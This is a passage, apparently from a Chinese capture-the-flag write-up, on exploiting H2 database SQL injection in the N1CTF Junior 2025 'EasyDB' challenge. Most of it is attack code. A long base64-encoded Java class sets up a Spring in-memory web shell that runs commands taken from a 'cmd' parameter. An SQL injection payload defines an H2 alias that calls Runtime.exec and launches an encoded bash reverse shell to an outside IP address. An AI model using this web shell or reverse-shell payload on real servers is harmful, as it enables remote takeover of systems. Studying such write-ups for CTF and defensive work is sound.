AnwcAoAsAJAChBwCiCABLBwCjCgApAKQHAKUIAKYKACsAjAcApwcAqAoALgCpBwCqBwCrBwCsBwCtBwCuBwCvCg
AxALAIAEkKACcAsQoAJQCyBwCzCgA7ALQHALUBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABENvZ
GUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAARhcmdzAQATW0xqYXZhL2xhbmcvU3Ry
aW5nOwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABHRoaXMBABRMSW5qZWN0VG9Db250cm9sbGV
yOwEAA2FhYQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHRlc3QBAAMoKVYBAAFwAQAaTGphdmEvbGFuZy9Qcm9jZX
NzQnVpbGRlcjsBAAFvAQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZ
XQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBT
ZXJ2bGV0UmVzcG9uc2U7AQAEYXJnMAEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEADVN0YWNrTWF
wVGFibGUHAKIHALYHALcHAIkHALgHAIgHAI8BAApFeGNlcHRpb25zBwC5AQAIPGNsaW5pdD4BAAdjb250ZXh0AQ
A3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpb
mdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5u
b3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEAB21ldGhvZDIBABpMamF2YS9sYW5nL3JlZmx
lY3QvTWV0aG9kOwEAA3VybAEASExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9jb25kaXRpb2
4vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZ
XQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQAEaW5mbwEAP0xvcmcvc3By
aW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEAEmluamVjdFR
vQ29udHJvbGxlcgEABHZhcjcBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsHALMBAApTb3VyY2VGaWxlAQAXSW5qZW
N0VG9Db250cm9sbGVyLmphdmEMAEUATAcAugwAuwC8AQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4d
C9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwAvQC+DAC/AMABAANjbWQHALYMAMEAwgcAtwwAwwDE
AQAAAQAHb3MubmFtZQcAxQwAxgDCDADHAMgBAAN3aW4MAMkAygEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgE
AEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAEUAPwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC
9TY2FubmVyDADLAMwHAM0MAM4AzwwARQDQAQADXFxBDADRANIMANMA1AwA1QDIDADWAEwHALgMANcARgwA2ABMA
QA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDZDADa
ANsBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9
zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSG
FuZGxlck1hcHBpbmcMANwA3QEAEkluamVjdFRvQ29udHJvbGxlcgEAD2phdmEvbGFuZy9DbGFzcwwA3gDfAQBGb
3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5zUmVxdWVzdENvbmRp
dGlvbgEACC9lZGlhaXN1AQBMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1J
lcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbgEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3
RhdGlvbi9SZXF1ZXN0TWV0aG9kDABFAOABAD1vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZ
XRob2QvUmVxdWVzdE1hcHBpbmdJbmZvAQBEb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29u
ZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb24BAEVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L21
2Yy9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb24BAEZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZX
J2bGV0L212Yy9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uAQBGb3JnL3NwcmluZ2ZyYW1ld29ya
y93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbgEAPm9yZy9zcHJpbmdm
cmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uDABFAOEMAEUARgwA4gD
jAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwA5ABMAQAQamF2YS9sYW5nL09iamVjdAEAJWphdmF4L3NlcnZsZXQvaH
R0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAE
2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93
ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGV
zAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOw
EACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc
3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVy
AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2l
vL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKC
lMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEABXN0Y
XJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEA
FygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGV
yAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leH
QBAAVjbG9zZQEABXdyaXRlAQAFZmx1c2gBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc
3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9s
YW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWd
ldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZW
N0L01ldGhvZDsBADsoW0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ld
GhvZDspVgEB9ihMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1BhdHRlcm5z
UmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1J
lcXVlc3RNZXRob2RzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdm
MvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZ
XQvbXZjL2NvbmRpdGlvbi9IZWFkZXJzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIv
c2VydmxldC9tdmMvY29uZGl0aW9uL0NvbnN1bWVzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29
yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2
ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvY29uZGl0aW9uL1JlcXVlc3RDb25kaXRpb247KVYBAA9yZWdpc3Rlc
k1hcHBpbmcBAG4oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFw
cGluZ0luZm87TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEAD3ByaW50U3R
hY2tUcmFjZQAhACcAPQAAAAAABAAJAD4APwABAEAAAAArAAAAAQAAAAGxAAAAAgBBAAAABgABAAAAFgBCAAAADA
ABAAAAAQBDAEQAAAABAEUARgABAEAAAAA9AAEAAgAAAAUqtwABsQAAAAIAQQAAAAoAAgAAABcABAAYAEIAAAAWA
AIAAAAFAEcASAAAAAAABQBJAEoAAQABAEsATAACAEAAAAGhAAYACAAAALe4AALAAAO2AARMuAACwAADtgAFTSsS
BrkABwIATiy5AAgBADoELcYAkBIJOgUSCrgAC7YADBINtgAOmQAhuwAPWQa9ABBZAxIRU1kEEhJTWQUtU7cAEzo
GpwAeuwAPWQa9ABBZAxIUU1kEEhVTWQUtU7cAEzoGuwAWWRkGtgAXtgAYtwAZEhq2ABs6BxkHtgAcmQALGQe2AB
2nAAUZBToFGQe2AB4ZBBkFtgAfGQS2ACAZBLYAIbEAAAADAEEAAABCABAAAAAeAAoAHwAUACAAHQAhACUAIgApA
CMALQAlAD0AJgBbACgAdgAuAIwALwCgADAApQAxAKwAMgCxADMAtgA5AEIAAABcAAkAWAADAE0ATgAGAC0AiQBP
AEoABQB2AEAATQBOAAYAjAAqAFAAUQAHAAAAtwBHAEgAAAAKAK0AUgBTAAEAFACjAFQAVQACAB0AmgBWAEoAAwA
lAJIAVwBYAAQAWQAAAC4ABf8AWwAGBwBaBwBbBwBcBwBdBwBeBwBdAAD8ABoHAF/8ACUHAGBBBwBd+AAXAGEAAA
AEAAEAYgAIAGMATAABAEAAAAE1AAkABwAAAIK4AAISIgO5ACMDAMAAJEsqEiW5ACYCAMAAJUwSJxIoA70AKbYAK
k27ACtZBL0AEFkDEixTtwAtTrsALlkDvQAvtwAwOgS7ADFZLRkEAcAAMgHAADMBwAA0AcAANQHAADa3ADc6BbsA
J1kSOLcAOToGKxkFGQYstgA6pwAISyq2ADyxAAEAAAB5AHwAOwADAEEAAAAyAAwAAABAAA8AQQAbAEIAJwBDADg
ARABFAEUAZQBGAHAARwB5AEoAfABIAH0ASQCBAE8AQgAAAFIACAAPAGoAZABlAAAAGwBeAGYAZwABACcAUgBoAG
kAAgA4AEEAagBrAAMARQA0AGwAbQAEAGUAFABuAG8ABQBwAAkAcABIAAYAfQAEAHEAcgAAAFkAAAAJAAL3AHwHA
HMEAAEAdAAAAAIAdQ==\"),org.springframework.util.ClassUtils.getDefaultClassLoader())\n"+
"$$\n";例题
[N1CTF Junior 2025]EasyDB
jadx 反编译一下,login 路由用 UserService.validateUser 来处理输入的账号密码
直接插入 sql 语句中,用 SecurityUtils.check 处理完整的 sql 语句
是个黑名单
很明显就是打 sql 注入,要绕下黑名单,看依赖可以发现是 h2 的数据库,打 Alias Script RCE ,直接拼接绕过就好了
admin'; CREATE ALIAS evil AS $$void poc(String cmd) throws Exception{ String R="R"+"untime";Class<?> c = Class.forName("java.lang."+R);Object rt=c.getMethod("get"+R).invoke(null);c.getMethod("exe"+"c",String.class).invoke(rt,cmd);}$$;CALL evil('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNDAuMTk1LjE5NC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}'); --
参考
https://paper.seebug.org/1832/#init-runscript
https://www.cnblogs.com/F12-blog/p/18144377
https://unam4.github.io/2024/11/12/h2%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9C%A8jdk17%E4%B8%8B%E7%9A%84rce%E6%8E%A2%E7%B4%A2/
https://unk.org.cn/2025/02/11/h2-inject/